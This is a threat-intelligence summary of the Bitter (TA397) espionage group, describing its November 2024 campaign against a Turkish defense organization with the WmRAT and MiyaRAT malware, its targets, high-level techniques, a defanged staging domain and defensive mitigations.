Full Report
A suspected South Asian cyber espionage threat group known as Bitter targeted a Turkish defense sector organization in November 2024 to deliver two C++-malware families tracked as WmRAT and MiyaRAT. "The attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads," Proofpoint
Analysis Summary
# Threat Actor: Bitter (TA397)
## Attribution & Identity
**Attribution:** Suspected South Asian cyber espionage threat group.
**Aliases/Known Groups:** TA397, APT-C-08, APT-Q-37, Hazy Tiger, Orange Yali.
## Activity Summary
Bitter has been active since at least 2013, engaging in cyber espionage, primarily focused on intelligence collection for a supporting South Asian government.
* **November 2024 Campaign:** Targeted a Turkish defense sector organization using social engineering related to public infrastructure projects in Madagascar, delivering WmRAT and MiyaRAT.
* **February 1, 2024:** Targeted an unnamed Chinese government agency via spear-phishing, deploying a trojan for data theft and remote control.
* **Prior Historical Activity:** Targeted entities in China, Pakistan, India, Saudi Arabia, and Bangladesh. Linked to Android malware deployment (PWNDROID2, Dracarys) in 2019 and 2022.
## Tactics, Techniques & Procedures
- Initial Access via spear-phishing utilizing booby-trapped RAR archives.
- **LNK File Delivery:** Used a shortcut (LNK) file within the archive.
- **Evasion/Steganography:** Employed Alternate Data Streams (ADS) in NTFS to conceal PowerShell code within the LNK file.
- **Persistence:** Created a scheduled task on the target machine to pull down further payloads.
- **C2 Communication:** Persistently utilize scheduled tasks to communicate with staging domains.
- **Capabilities:** Remote access trojan (RAT) functionality including host information collection, file exfiltration/download, screenshot capture, geolocation tracking, and arbitrary command execution (cmd.exe/PowerShell).
- [Implied TTPs for LNK/ADS delivery may align with techniques such as T1204.002, T1547.001, and T1027.]
## Targeting
- **Sectors:** Defense sector, Government agencies.
- **Geography:** Turkey (recent), China, Pakistan, India, Saudi Arabia, Bangladesh.
- **Victims:** A Turkish defense sector organization (Nov 2024); An unnamed Chinese government agency (Feb 2024).
## Tools & Infrastructure
- **Malware Families:** WmRAT, MiyaRAT (reserved for high-value targets), BitterRAT, ArtraDownloader, ZxxZ, PWNDROID2 (Android), Dracarys (Android).
- **Infrastructure (C2/Staging):** joe.jacknwoods[.]com (Defanged: jacknwoods[.]com)
- **Lure Material:** Decoy documents discussing public infrastructure projects and a World Bank public initiative in Madagascar.
## Implications
Bitter is a persistent, cross-platform (Windows/Android) espionage group with a sustained focus on intelligence gathering, often targeting government and defense organizations across Asia and the Middle East, and recently extending activity toward Turkey. The use of ADS and scheduled tasks demonstrates a focus on stealthy persistence and maintaining access for long-term intelligence collection and IP theft.
## Mitigations
- Implement network monitoring focused on outbound connections initiated by scheduled tasks, especially when linked to recent file modifications.
- Enhance inspection/scanning of archive file types (RAR) and LNK files for malicious contents or unusual ADS usage.
- Security controls should actively monitor for the execution of PowerShell scripts originating from unexpected file sources or those attempting to establish persistence mechanisms.
- Maintain awareness of BEC/social engineering lures related to international infrastructure or development projects.